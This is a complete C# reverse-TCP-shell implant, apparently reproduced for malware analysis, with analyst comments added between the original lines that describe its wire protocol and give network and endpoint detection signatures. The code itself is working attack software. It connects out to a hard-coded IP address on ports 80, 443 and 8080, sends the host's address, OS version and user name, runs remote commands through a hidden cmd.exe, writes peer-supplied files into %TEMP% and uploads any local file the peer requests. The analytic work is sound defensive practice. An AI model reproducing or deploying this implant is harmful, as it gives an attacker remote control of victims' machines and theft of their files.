- using System;
- using System.IO;
- using System.Collections.Generic;
- using System.Text;
- using System.Threading;
- using System.Net;
- using System.Net.Sockets;
- using System.Diagnostics;
- using System.Runtime.InteropServices;
// ANALYSIS NOTES (comments only; the listing below is unchanged).
// ReverseTCPShell is a remote-access implant: it dials OUT to a hard-coded host, announces itself,
// and then lets the remote peer (a) run commands through a hidden cmd.exe, (b) push files onto the
// local disk under %TEMP%, and (c) pull arbitrary local files back over the same socket.
// Wire format visible in this listing: fields separated by the literal "|*|", first field is a verb
// (LOGIN, CMD, FILEHEAD, FILESEND, FILERECEIVE). The channel is a raw NetworkStream with no TLS and
// no HTTP framing, even though the ports used are 80/443/8080 - plaintext "LOGIN|*|" / "CMD|*|" on
// those ports is a usable network signature.
- public class ReverseTCPShell{
// 8 KiB buffer sizes. Neither constant is referenced elsewhere in this listing; the code repeats
// the literal 1024 * 8 instead.
- const int MAX_SEND_BUFFER = 1024 * 8;
- const int MAX_RECV_BUFFER = 1024 * 8;
// All state is static and shared between the connection thread, the listener thread and the
// process output callbacks; no locking is visible anywhere in the class.
// count and UserInput are declared but not used in this listing.
- public static int count = 0;
- public static TcpClient tcpClient;
- public static NetworkStream stream;
- public static StreamReader streamReader;
- public static StreamWriter streamWriter;
- public static StringBuilder UserInput;
// Handle to the spawned cmd.exe (see startCmd).
- public static Process CmdProc;
// Inbound file-transfer state, filled in by the FILEHEAD verb in DataReceived.
- public static string filename, fileext, filesize;
- public static int offset = 0;
- public static byte[] filebuffer;
- public static Thread listen;
// iscmdexit == true means "no live cmd.exe child"; isfilesend == true means "raw bytes that arrive
// next belong to an inbound file".
- public static bool iscmdexit=true;
- public static bool isfilesend=false;
// des: plain holder for one remote endpoint (s = host string, d = TCP port).
- public class des{
- public string s;
- public int d;
- public des(string _s, int _d){this.s = _s;this.d=_d;}}
// run(): entry point. Three endpoints are built, all on the same hard-coded address
// (27.126.186.222) and differing only by port: 80, 443, 8080. The loop never exits: each endpoint
// is tried in turn via runth(), then the thread sleeps 20000 ms before the next round.
// For hunting: repeated outbound connects to one address cycling 80 -> 443 -> 8080 with
// roughly 20-second gaps is the retry pattern this loop produces when the peer is unreachable.
- public static void run(){des de1 = new des("27.126.186.222",80);des de2 = new des("27.126.186.222",443);des de3 = new des("27.126.186.222",8080);
- for (; ; ){runth(de1.s, de1.d, 20);runth(de2.s, de2.d, 20);runth(de3.s, de3.d, 20);System.Threading.Thread.Sleep(20000);}}
// runth(): despite the for(;;), the body returns on its first pass, so this is one call to start()
// followed by a sleep of sl seconds (sl * 1000 ms).
- public static void runth(string si, int po, int sl){for (; ; ){start(si, po, sl);System.Threading.Thread.Sleep(sl * 1000);return;}}
// start(): one connection lifetime. Connects a new TcpClient to IP:port, wraps the stream in a
// reader/writer using Encoding.Default, and starts StartListen on a second thread. This thread then
// polls isOnline() every 10000 ms; when the link is gone it closes the reader/writer, kills the
// cmd.exe child if one is running, closes the socket and returns. SleepTime is not used in the body.
// Every exception is swallowed by the catch on the line that also begins StartListen, so a failed
// connect leaves no trace beyond the attempted connection itself.
- public static void start(string IP, int port, int SleepTime){try{tcpClient = new TcpClient();if (!tcpClient.Connected){tcpClient.Connect(IP, port);
- stream = tcpClient.GetStream();streamReader = new StreamReader(stream, System.Text.Encoding.Default);
- streamWriter = new StreamWriter(stream, System.Text.Encoding.Default);listen = new Thread(new ParameterizedThreadStart(StartListen));
- listen.Start(tcpClient);while (true){if (!isOnline(tcpClient)){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }tcpClient.Close();return;}
// The next line finishes start() (10 s poll sleep, catch-all) and then opens StartListen().
// StartListen(): listener thread. It first sends the LOGIN record (SendLoginInfo), then loops
// reading up to 8192 bytes per Read() from the shared static stream and hands each chunk to
// DataReceived(). The client argument is not used. Any exception - including one thrown inside
// DataReceived - closes the reader/writer, kills cmd.exe if running, and ends the loop.
- Thread.Sleep(10000);}}}catch (Exception){return;}}private static void StartListen(object client){
- SendLoginInfo();while (true){try{byte[] RData = new byte[1024 * 8];int len = stream.Read(RData, 0, RData.Length);
- if (len > 0){byte[] data = new byte[len];Array.Copy(RData, 0, data, 0, len);DataReceived(data, len);}}
- catch (Exception){streamReader.Close();streamWriter.Close();if (!iscmdexit) { CmdProc.Kill(); }break;}}}
// isOnline(): liveness probe. Reports "offline" when the socket polls readable yet has zero bytes
// available, or when Client.Connected is false; otherwise "online".
- public static bool isOnline(TcpClient c){return !((c.Client.Poll(1000, SelectMode.SelectRead) && (c.Client.Available == 0)) || !c.Client.Connected);}
// startCmd(): spawns cmd.exe with UseShellExecute = false and stdin/stdout/stderr all redirected,
// wires stdout and stderr lines to SortOutputHandler and process exit to CmdExited, then clears
// iscmdexit. For endpoint detection: a cmd.exe child of a .NET process that also holds an outbound
// TCP connection, with all three standard handles redirected, matches what this method creates.
- public static void startCmd(){CmdProc = new Process();CmdProc.StartInfo.FileName = "cmd.exe";
- CmdProc.StartInfo.UseShellExecute = false;CmdProc.StartInfo.RedirectStandardInput = true;
- CmdProc.StartInfo.RedirectStandardOutput = true;CmdProc.StartInfo.RedirectStandardError = true;
- CmdProc.EnableRaisingEvents = true;CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
- CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
- CmdProc.Exited += new EventHandler(CmdExited);CmdProc.Start();
- CmdProc.BeginOutputReadLine();CmdProc.BeginErrorReadLine();iscmdexit = false;}
// CmdExited(): Exited-event callback; marks the shell as gone so the next CMD verb respawns it.
- public static void CmdExited(object sender, EventArgs e){iscmdexit = true;}
// DataReceived(): dispatcher for everything read from the socket. The chunk is decoded with
// Encoding.Default, split on "|*|", and the first field selects the action. The length parameter
// is not used in the body.
- public static void DataReceived(byte[] data, int length){
// FILEHEAD (peer -> host file drop, header): second field is "name|ext|size". The target path is
//   %TEMP% + "\" + name, with the name taken from the peer as-is, so the write location is
//   peer-influenced; an empty file is created there, a buffer of <size> bytes is allocated, and
//   isfilesend is set so that following raw chunks are treated as file content.
// FILESEND: recognised but does nothing.
- string receivedmsg = System.Text.Encoding.Default.GetString(data);string[] rdArray = receivedmsg.Split(new string[] { "|*|" }, StringSplitOptions.None);switch (rdArray[0]){case "FILEHEAD": string temp = System.Environment.GetEnvironmentVariable("TEMP");DirectoryInfo info = new DirectoryInfo(temp); string[] finfo = rdArray[1].Split(new string[] { "|" }, StringSplitOptions.None);filename=info.FullName+"\\"+finfo[0];fileext = finfo[1];filesize = finfo[2];filebuffer = new byte[Convert.ToInt32(finfo[2])];FileStream fstream = new FileStream(filename, FileMode.Create);fstream.Close();fstream.Dispose();isfilesend = true;offset = 0;break;case "FILESEND":break;
// FILERECEIVE (host -> peer file read): the second field up to the first CRLF is a local path that
//   is handed to FileReceive(), i.e. the peer chooses which local file is sent back.
// CMD: the second field is written to cmd.exe's stdin via CmdManager().
- case "FILERECEIVE":
- string[] fr = rdArray[1].Split(new string[] { "\r\n" }, StringSplitOptions.None);FileReceive(fr[0]);break;case "CMD":CmdManager(rdArray[1]);break;
// default: any chunk whose first field is not a known verb. Ignored unless a FILEHEAD is pending;
//   otherwise the raw bytes are appended to filebuffer at offset, and once offset reaches the
//   announced size the buffer is written to the path chosen at FILEHEAD time and the transfer flag
//   is cleared. The whole file is held in memory until then.
- default:if(!isfilesend){break;}if (offset < Convert.ToInt32(filesize)){Array.Copy(data, 0, filebuffer, offset, data.Length );offset += data.Length;
- if (offset >= Convert.ToInt32(filesize)){FileStream filestream = new FileStream(filename, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.ReadWrite);
// The next line finishes DataReceived() and then opens FileReceive().
// FileReceive(filep): sends a local file to the peer. It first writes the text line
// "FILEHEAD|*|<name>|<extension>|<length>", pauses 5 ms, then streams the file in reads of up to
// 8192 bytes with a 10 ms pause after each write. On any exception it reports
// "CMD|*|File access error: <exception text>" to the peer instead.
- filestream.Write(filebuffer, 0, filebuffer.Length);filestream.Close();filestream.Dispose();Array.Clear(filebuffer, 0, filebuffer.Length);isfilesend=false;}}break;}}public static void FileReceive(string filep){try{FileInfo fInfo = new FileInfo(filep);string fsend = "FILEHEAD|*|" + fInfo.Name + "|" + fInfo.Extension + "|" + fInfo.Length.ToString();
- streamWriter.WriteLine(fsend);streamWriter.Flush();Thread.Sleep(5);FileStream fstream = new FileStream(filep, FileMode.Open);int size = 0;
- while (size < fInfo.Length){byte[] sendbuffer = new byte[1024 * 8];int count = fstream.Read(sendbuffer, 0, sendbuffer.Length);
- size += count;byte[] buf = new byte[count];Array.Copy(sendbuffer, 0, buf, 0, count);stream.Write(buf, 0, count);stream.Flush();Thread.Sleep(10);}fstream.Close();}catch(Exception e){streamWriter.WriteLine("CMD|*|File access error: "+e.ToString());
// The next line finishes FileReceive(), then holds CmdManager() in full and opens SortOutputHandler().
// CmdManager(cmd): starts cmd.exe on demand (when iscmdexit is true) and writes cmd plus a newline
// to its stdin; the text comes straight from the peer's CMD record.
// SortOutputHandler(): callback for each stdout/stderr line of cmd.exe; non-empty lines go back to
// the peer as "CMD|*|<line>". Send failures are silently ignored.
- streamWriter.Flush();}}public static void CmdManager(string cmd){if(iscmdexit){startCmd();}CmdProc.StandardInput.WriteLine(cmd);}public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine){
// The next line holds the body of SortOutputHandler() and then opens SendLoginInfo().
// SendLoginInfo(): host fingerprint sent once per connection. It picks an IPv4 address from
// Dns.GetHostEntry("") (the last InterNetwork entry wins; 127.0.0.1 if none), and builds
// "LOGIN|*|<ipv4>|*|<OS version>|*|<user name>". This record is the first thing written on every
// new connection, which makes "LOGIN|*|" at the start of a client-to-server flow a stable marker.
- StringBuilder strOutput = new StringBuilder();if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append("CMD|*|" + outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception) { }}}public static void SendLoginInfo(){IPAddress ipaddr = IPAddress.Parse("127.0.0.1");foreach (IPAddress _ip in Dns.GetHostEntry("").AddressList){if (_ip.AddressFamily.ToString() == "InterNetwork"){ipaddr = _ip;}}string token = "LOGIN";Version ver = System.Environment.OSVersion.Version;string name = System.Environment.UserName.ToString();string sdata = token + "|*|" + ipaddr.ToString() + "|*|" + ver.ToString() + "|*|"+ name;
- byte[] ddata = System.Text.Encoding.Default.GetBytes(sdata);Send(ddata, (UInt32)ddata.Length);}
// Send(): forwards to SendWithSplit with an 8 KiB chunk size. msgSize is only tested for > 0; the
// length actually sent is sendmsg.Length. The return value of SendWithSplit is discarded.
- public static void Send(byte[] sendmsg, UInt32 msgSize){if (msgSize > 0){SendWithSplit(sendmsg, sendmsg.Length, 1024 * 8);}return;}
// SendWithSplit(): writes data to the shared stream in nSplitSize-byte pieces, flushing and pausing
// 10 ms after each full piece, then writes the remainder. Returns the byte count when it equals
// nSize, otherwise -1. The decoded string outp is computed but never used.
- public static int SendWithSplit(byte[] data, int nSize, int nSplitSize){string outp = System.Text.Encoding.Default.GetString(data);int flag = 0;
- while ((flag + nSplitSize) < nSize){stream.Write(data, flag, nSplitSize);stream.Flush();flag += nSplitSize;System.Threading.Thread.Sleep(10);}
- if (flag < nSize){stream.Write(data, flag, nSize - flag);flag += (nSize - flag);}if (flag == nSize){return flag;}else{return -1;}}}